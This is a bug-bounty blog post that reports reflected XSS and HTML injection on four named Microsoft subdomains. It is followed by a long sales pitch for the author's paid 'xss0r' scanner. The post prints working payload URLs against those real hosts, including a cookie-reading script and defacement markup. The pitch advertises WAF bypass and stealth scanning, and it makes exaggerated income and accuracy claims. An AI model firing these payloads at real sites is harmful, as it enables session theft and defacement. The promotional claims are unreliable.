My Journey to Uncovering Reflected XSS and HTML Injection in 4 Microsoft Subdomains

The Beginning

It was an ordinary morning, and I found myself pondering what to test next in the vast realm of bug bounty. My mind wandered through countless possibilities until it landed on an intriguing idea: testing Microsoft’s domains. With a spark of curiosity, I embarked on a journey to explore and uncover potential vulnerabilities.

The Exploration

Enumerating Subdomains

I began by enumerating subdomains, systematically probing each one for weaknesses. It was a meticulous process, but my excitement grew with every discovery. Among the myriad of subdomains, one particular domain caught my attention: appleconfigurator2.manage.microsoft.com.

The Discovery

Initial Test: Reflection in Path

My initial tests revealed something interesting. I entered some value into the path of the URL:

https://appleconfigurator2.manage.microsoft.com/BadRequest.html/value

To my surprise, the value was reflected in the response. This observation signaled a potential vulnerability, prompting me to delve deeper, and I got another new parametre //?aspxerrorpath.

Uncovering Reflected XSS

With a hypothesis forming in my mind, I decided to test for XSS. Reflected XSS occurs when a web application includes user input in its output without proper sanitization, allowing attackers to inject and execute malicious scripts. I crafted a payload and inserted it into the BadRequest parametre.

I started with payload: javascript:alert(1)

And I didn’t get any popup…

So I decided to run my #xss0r Tool on the path after “BadRequest.html” and with using — path option in my tool for supporting XSS in web paths.

This tool is designed to test for XSS vulnerabilities efficiently. As expected, it generated numerous alerts because I used over 3000 different encoding XSS payloads and confirming the presence of a Reflected XSS vulnerability. My tool made the process quick and seamless, demonstrating its effectiveness in identifying security issues.

FULL REPORT FILE: https://www.sendspace.com/file/wm3wpr

Final URL for XSS:

• https://appleconfigurator2.manage.microsoft.com/BadRequest.html//?aspxerrorpath=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Discovering HTML Injection

With the momentum from my XSS discovery, I shifted focus to test for HTML Injection. This vulnerability involves injecting arbitrary HTML content, leading to unauthorized actions and information disclosure.

Payload:

';a=prompt,a()//?aspxerrorpath=/MDMServiceConfig%20%3Cimg%20src=1%20onerror=alert(1)%3E%3Cdiv%20style=%22overflow:%20hidden;%20white-space:%20nowrap;%22%3E%3Cmarquee%20style=%22color:red;font-size:50px;%22%20behavior=%22scroll%22%20direction=%22left%22%20scrollamount=%2210%22%3EHACKED%20BY%20%3Cspan%20style=%22color:red;font-size:60px;%22%3E1BR0%3C/span%3E%3C/marquee%3E

FINAL URL:

https://appleconfigurator2.manage.microsoft.com/BadRequest.html';a=prompt,a()//?aspxerrorpath=/MDMServiceConfig%20%3Cimg%20src=1%20onerror=alert(1)%3E%3Cdiv%20style=%22overflow:%20hidden;%20white-space:%20nowrap;%22%3E%3Cmarquee%20style=%22color:red;font-size:50px;%22%20behavior=%22scroll%22%20direction=%22left%22%20scrollamount=%2210%22%3EHACKED%20BY%20%3Cspan%20style=%22color:red;font-size:60px;%22%3E1BR0%3C/span%3E%3C/marquee%3E

Expanding the Search

With these findings, I decided to expand my search to other subdomains. I was eager to see if the vulnerabilities existed elsewhere. After thorough testing using my #xss0r Tool, I discovered the same Reflected XSS and HTML Injection vulnerabilities on three additional subdomains:

Domain 1: https://appleconfigurator2.manage-beta.microsoft.com

• HTML Injection PoC URL:

https://appleconfigurator2.manage-beta.microsoft.com/BadRequest.html';a=prompt,a()//?aspxerrorpath=/MDMServiceConfig%20%3Cimg%20src=1%20onerror=alert(1)%3E%3Cdiv%20style=%22overflow:%20hidden;%20white-space:%20nowrap;%22%3E%3Cmarquee%20behavior=%22scroll%22%20direction=%22left%22%20scrollamount=%2210%22%3EHACKED%20BY%201BR0%3C/marquee%3E%3C/div%3E%3Ctitle%3EWelcome%20to%20Hacked%20Page%3C/title%3E%3Cbody%20style=%22background-color:%20black;%20color:%20white;%20font-family:%20Arial,%20sans-serif;%22%3E%3Ch1%3EWelcome%20to%20the%20Hacked%20Page%3C/h1%3E%3Cp%3EThis%20page%20has%20been%20hacked!%3C/p%3E%3Cmenu%3E%3Cli%3E%3Ca%20href=%22#%22%3EHome%3C/a%3E%3C/li%3E%3Cli%3E%3Ca%20href=%22#%22%3EAbout%20Us%3C/a%3E%3C/li%3E%3Cli%3E%3Ca%20href=%22#%22%3EContact%3C/a%3E%3C/menu%3E%3Cstyle%3Eh1%20{%20animation:%20rainbowText%205s%20infinite;%20}%20@keyframes%20rainbowText%20{%200%%20{%20color:%20red;%20}%2016%%20{%20color:%20orange;%20}%2033%%20{%20color:%20yellow;%20}%2050%%20{%20color:%20green;%20}%2066%%20{%20color:%20blue;%20}%2083%%20{%20color:%20indigo;%20}%20100%%20{%20color:%20violet;%20}%20}%3C/style%3E%3C/body%3E

Domain 2: https://appleconfigurator2.manage-dogfood.microsoft.com

• HTML Injection PoC URL:

https://appleconfigurator2.manage-dogfood.microsoft.com/badrequest.html';a=prompt,a()//?aspxerrorpath=/MDMServiceConfig%20%3Cimg%20src=1%20onerror=alert(1)%3E%3Cdiv%20style=%22overflow:%20hidden;%20white-space:%20nowrap;%22%3E%3Cmarquee%20style=%22color:red;font-size:50px;%22%20behavior=%22scroll%22%20direction=%22left%22%20scrollamount=%2210%22%3EHACKED%20BY%20%3Cspan%20style=%22color:red;font-size:60px;%22%3E1BR0%3C/span%3E%3C/marquee%3E

Domain 3: https://appleconfigurator2.manage-selfhost.microsoft.com

• HTML Injection PoC URL:

https://appleconfigurator2.manage-selfhost.microsoft.com/BadRequest.html';a=prompt,a()//?aspxerrorpath=/MDMServiceConfig%20%3Cimg%20src=1%20onerror=alert(1)%3E%3Cdiv%20style=%22overflow:%20hidden;%20white-space:%20nowrap;%22%3E%3Cmarquee%20behavior=%22scroll%22%20direction=%22left%22%20scrollamount=%2210%22%3EHACKED%20BY%201BR0%3C/marquee%3E%3C/div%3E%3Ctitle%3EWelcome%20to%20Hacked%20Page%3C/title%3E%3Cbody%20style=%22background-color:%20black;%20color:%20white;%20font-family:%20Arial,%20sans-serif;%22%3E%3Ch1%3EWelcome%20to%20the%20Hacked%20Page%3C/h1%3E%3Cp%3EThis%20page%20has%20been%20hacked!%3C/p%3E%3Cmenu%3E%3Cli%3E%3Ca%20href=%22#%22%3EHome%3C/a%3E%3C/li%3E%3Cli%3E%3Ca%20href=%22#%22%3EAbout%20Us%3C/a%3E%3C/li%3E%3Cli%3E%3Ca%20href=%22#%22%3EContact%3C/a%3E%3C/menu%3E%3Cstyle%3Eh1%20{%20animation:%20rainbowText%205s%20infinite;%20}%20@keyframes%20rainbowText%20{%200%%20{%20color:%20red;%20}%2016%%20{%20color:%20orange;%20}%2033%%20{%20color:%20yellow;%20}%2050%%20{%20color:%20green;%20}%2066%%20{%20color:%20blue;%20}%2083%%20{%20color:%20indigo;%20}%20100%%20{%20color:%20violet;%20}%20}%3C/style%3E%3C/body%3E

Conclusion

My journey to uncover these vulnerabilities highlights the critical importance of continuous security assessments. Using my #xss0r Tool, I was able to efficiently identify and validate Reflected XSS and HTML Injection vulnerabilities across four different Microsoft subdomains. This tool has proven to be an invaluable asset in my security toolkit, making the process of vulnerability detection both quick and effective.

By addressing these issues promptly, Microsoft can enhance the security of its applications, protect its users, and maintain trust in its brand. For further clarity, I have attached images and videos illustrating the exploitation of these vulnerabilities. If you have any questions or require additional information, feel free to contact me on my Linkedin profile:

https://www.linkedin.com/in/ibrahim-husi%C4%87-101430102/

Proof of Concept:

And here is the video of the #xss0r Tool DEMO:

#xss0r Tool Presentation

🚀 Unlock the Power of XSS Vulnerability Detection with xss0r!🚀
Discover the cutting-edge features of #xss0r:
With features like:

✅ Zero False Positives
💡 Unique Innovation
🎯 Flexible Detection Modes
🔗 POST and GET Requests
🌐 DOM-Based XSS
🔍 Path-Based Analysis
📱 JSON Web Apps
📊 Exportable Reports
🔓 WAF Bypass
🕵️‍♂️ Stealth Mode
💼 Efficiency
💥 Over 2500 Encoded Payloads
🛠️ Lab-Tested and Field-Ready
🔄 Multi-threading
⏳ Customizable Delay
⚡️ Scans 2500 payloads on 1 URL in only 15 seconds! ⚡️🔥
🔌 XSS into all kinds of extensions
🔒 Secure and Reliable
🌟 Continuous Updates
📈 High Performance
🔄 Automated Scanning
🔍 Accurate Detection Algorithms
🔧 Easy Configuration
📂 Support for Various Web Technologies
🚀 Rapid Deployment
🔎 Advanced Search and Filter Options
🔧 Customizable Payloads

✅ Zero False Positives

Say goodbye to the noise. The #xss0r Tool is engineered to deliver zero false positives, ensuring that every alert is a genuine threat. Trust in its accuracy and save valuable time by focusing only on real vulnerabilities.

💡 Unique Innovation

Harness the power of unique innovation that drives the #xss0r Tool. It integrates advanced algorithms and techniques that you won’t find anywhere else, giving you a cutting-edge advantage in identifying and mitigating XSS vulnerabilities.

🎯 Flexible Detection Modes

Adapt to any scenario with flexible detection modes. Whether you need to scan quickly or perform a deep analysis, the #xss0r Tool offers customizable options to fit your specific needs and ensure comprehensive coverage.

🔗 POST and GET Requests

Thoroughly test your web applications with support for both POST and GET requests. This ensures that every potential entry point for XSS attacks is examined, providing robust security for your web properties.

🌐 DOM-Based XSS

Stay ahead of attackers with the ability to detect DOM-based XSS vulnerabilities. The #xss0r Tool delves into client-side scripts, identifying threats that traditional tools often miss.

🔍 Path-Based Analysis

Benefit from path-based analysis that tracks how data flows through your application. This allows for pinpoint detection of vulnerabilities, ensuring no critical paths are left unchecked.

📱 JSON Web Apps

In the era of dynamic web applications, the #xss0r Tool excels at scanning JSON Web Apps. It understands and parses JSON, detecting vulnerabilities in modern web architectures.

📊 Exportable Reports

Communicate findings effectively with exportable reports. Share detailed, professional reports with stakeholders, demonstrating the thoroughness and effectiveness of your security efforts.

🔓 WAF Bypass

Overcome the barriers of Web Application Firewalls with WAF bypass capabilities. The #xss0r Tool is designed to evade WAF protections, ensuring a true assessment of your web security.

🕵️‍♂️ Stealth Mode

Operate under the radar with stealth mode. Conduct scans discreetly without alerting potential intruders, maintaining the element of surprise and security.

💼 Efficiency

Experience unmatched efficiency in your security processes. The #xss0r Tool maximizes productivity, allowing you to secure your applications faster and with greater accuracy.

💥 Over 2500 Encoded Payloads

Leverage the power of over 2500 encoded payloads to test a wide range of XSS attack vectors. This comprehensive approach ensures no stone is left unturned in your security assessments.

🛠️ Lab-Tested and Field-Ready

Rest assured with a tool that is lab-tested and field-ready. The #xss0r Tool has been rigorously tested in both controlled environments and real-world scenarios, guaranteeing its reliability and effectiveness.

🔄 Multi-threading

Speed up your scanning process with multi-threading. The #xss0r Tool efficiently utilizes system resources, allowing for concurrent scanning and faster results.

⏳ Customizable Delay

Tailor your scans with customizable delay settings. Control the pacing of your tests to match your specific environment and requirements, ensuring optimal performance and accuracy.

⚡️ Scans 2500 Payloads on 1 URL in Only 15 Seconds! ⚡️🔥

Achieve unparalleled speed with the ability to scan 2500 payloads on 1 URL in just 15 seconds. This blazing-fast performance sets a new standard in web security, enabling rapid and thorough assessments.

🔌 XSS into all kinds of extensions🔌

Expand your security coverage with XSS detection into all kinds of URL extensions. The #xss0r Tool supports testing XSS vulnerabilities in various URL extensions, such as changing login.php to test payloads like {payload}.php. This ensures comprehensive testing across different file types and URL structures.

🔒 Secure and Reliable🔒

Rely on a tool designed with security and reliability at its core. The #xss0r Tool employs robust security measures to ensure your data and processes remain protected, providing peace of mind as you test for vulnerabilities.

🌟 Continuous Updates🌟

Stay ahead of evolving threats with continuous updates. The #xss0r Tool is regularly updated with the latest techniques and payloads, ensuring it remains effective against the newest vulnerabilities and attack vectors.

📈 High Performance📈

Experience top-tier performance with the #xss0r Tool. Optimized for speed and efficiency, it delivers rapid and accurate results, allowing you to secure your applications without compromising on performance.

🔄 Automated Scanning🔄

Automate your security processes with ease. The #xss0r Tool supports fully automated scanning, enabling you to schedule regular scans and maintain continuous security monitoring with minimal manual intervention.

🔍 Accurate Detection Algorithms🔍

Benefit from precise and reliable vulnerability detection. The #xss0r Tool uses advanced algorithms to accurately identify XSS vulnerabilities, minimizing false positives and ensuring thorough coverage.

🔧 Easy Configuration🔧

Set up and start scanning quickly with easy configuration options. The #xss0r Tool offers user-friendly settings and intuitive controls, making it accessible even for those new to web security testing.

📂 Support for Various Web Technologies📂

Ensure comprehensive security across different platforms. The #xss0r Tool supports a wide range of web technologies, providing versatile scanning capabilities for diverse web environments.

🚀 Rapid Deployment🚀

Deploy the #xss0r Tool swiftly and efficiently. Its straightforward installation process and minimal setup requirements mean you can start securing your applications in no time.

🔎 Advanced Search and Filter Options🔎

Streamline your analysis with advanced search and filter options. The #xss0r Tool allows you to quickly locate specific vulnerabilities and focus on the most critical issues, enhancing your productivity and effectiveness.

🔧 Customizable Payloads🔧

Customize your testing with tailored payloads. The #xss0r Tool supports the creation and use of custom payloads, allowing you to adapt your scans to specific needs and scenarios for more precise vulnerability detection.

Proven Performance in Bug Bounty Platforms

The #xss0r Tool has been proven on tens of bug bounty platforms, including Microsoft. In just 2 months, I discovered over 30 XSS vulnerabilities using this tool. Imagine the potential earnings: bug bounty platforms pay between $500 and $3000 for XSS findings. By investing a modest amount between $20 to $70 in this tool, you can earn tens of thousands of dollars. It’s a smart investment for passive income. Simply collect URLs, run the tool overnight, and wake up to results in the morning. That’s how I’ve been doing it, and now you can too.

Remember how many bug bounty platforms there are, and if you find just one XSS vulnerability on each of these platforms, you could earn over hundreds of thousands in a year by focusing clearly and testing all possible inputs and fields. You can be confident that if there is an XSS vulnerability, this tool will find it. You will be sure that it will find it.

Embrace the future of web security with the #xss0r Tool and elevate your vulnerability detection to new heights. Don’t just secure your web applications — dominate the landscape with the most advanced XSS tool available.

#xss0r #ibrahimXSS #@ibrahimxss0r #ibrahimxss0r #xsstool